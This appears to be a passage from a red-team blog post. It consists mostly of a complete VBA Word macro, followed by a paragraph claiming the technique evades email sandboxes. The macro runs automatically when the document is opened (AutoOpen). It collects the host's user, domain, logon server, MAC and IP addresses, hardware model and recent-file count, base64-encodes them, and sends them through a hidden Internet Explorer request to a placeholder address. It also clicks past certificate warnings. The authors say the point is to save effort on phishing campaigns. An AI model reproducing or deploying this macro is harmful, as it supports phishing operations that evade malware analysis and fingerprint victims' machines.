Function MakeModel() retStr = "" strComputer = "." strQuery = "SELECT * FROM Win32_ComputerSystem" Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2") Set colItems = objWMIService.ExecQuery(strQuery) For Each objItem In colItems retStr = objItem.Manufacturer retStr = retStr & "|" & objItem.Model Next MakeModel = retStr End Function Function EnvironVars() sHostname = Environ("computername") & "|" & Environ("username") & _ "|" & Environ("userdomain") & "|" & Environ("LOGONSERVER") EnvironVars = sHostname End Function Function RecentFiles() Set wdApp = ActiveDocument.Application RecentFiles = wdApp.RecentFiles.Count End Function Function GetCores() Dim objWMIService, cores, Proc, strQuery strQuery = "select * from Win32_PerfFormattedData_PerfOS_Processor" Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\.rootcimv2") Set cores = objWMI.ExecQuery(strQuery, , 48) Set GetCores = cores End Function Function GetNetwork() retStr = "" strComputer = "." strQuery = "Select * From Win32_NetworkAdapter Where PhysicalAdapter = True" Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2") Set colItems = objWMIService.ExecQuery(strQuery) Set ipItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration") For Each objItem In colItems strMacAddress = objItem.MACAddress sysName = objItem.SystemName For Each ipItem In ipItems If ipItem.MACAddress = strMacAddress And ipItem.IPEnabled = "True" Then retStr = retStr & strMacAddress & "|" & ipItem.IPAddress(0) & "|" Exit For End If Next Next GetNetwork = retStr End Function Private Function Enc(ByVal strData As String) As Byte() Dim arrData() As Byte arrData = StrConv(strData, vbFromUnicode) Set objXML = CreateObject("MSXml2.DOMDocument") Set objDocElem = objXML.createElement("data") objDocElem.dataType = "bin.base" & Chr(54) & Chr(52) objDocElem.nodeTypedValue = arrData Enc = objDocElem.Text Set objNode = Nothing Set objXML = Nothing End Function Private Function Dec(ByVal strData As String) As Byte() Set objXML = CreateObject("MSXml2.DOMDocument") Set objDocElem = objXML.createElement("data") objDocElem.dataType = "bin.base" & Chr(54) & Chr(52) objDocElem.Text = strData Dec = objDocElem.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Sub DoStuff(ByVal strData As String) Dim IE As Object Dim strBaseURL As String Dim pre As String address = "http://127.0.0.1/" 'strBaseURL = StrConv(Dec(address), 64) Set IE = CreateObject("InternetExplorer.Application") IE.Visible = False IE.navigate address & strData On Error GoTo ErrorHandler Do While IE.Busy: DoEvents: Loop Do While IE.ReadyState <> 4: DoEvents: Loop Set doc = IE.Document If Not IsNull(doc.getElementById("overridelink")) Then Set lnkOverRide = doc.getElementById("overridelink") If Not lnkOverRide Is Nothing Then lnkOverRide.Click Do While IE.Busy: DoEvents: Loop Do While IE.ReadyState <> 4: DoEvents: Loop Set doc = IE.Document End If Else Do While IE.Busy: DoEvents: Loop Do While IE.ReadyState <> 4: DoEvents: Loop Set doc = IE.Document End If Dim testString As String testString = IE.Document.body.innerText IE.Stop IE.Quit ErrorHandler: Exit Sub End Sub Sub AutoOpen() Dim retStr As String Set cores = GetCores Length = 0 For Each i In cores Length = Length + 1 Next retStr = Str(Length - 1) retStr = retStr & "|" & RecentFiles retStr = retStr & "|" & EnvironVars retStr = retStr & "|" & GetNetwork retStr = retStr & "|" & MakeModel retStr = Enc(retStr) DoStuff (retStr) End Sub

We believe this technique to be reasonably effective against most modern email sandboxes. The only mitigation to this technique is if the results could be randomized or if the outgoing connection with the results was blocked. The first mitigation would be quite difficult since the enumeration script can poll any number of identifying pieces of data. The second would also be difficult since the purpose of the sandbox is to let the malware run in order to profile it. For now, our team will save a few more hours creating phishing content and a few more dollars buying phishing domains. The ball is back in your court defense.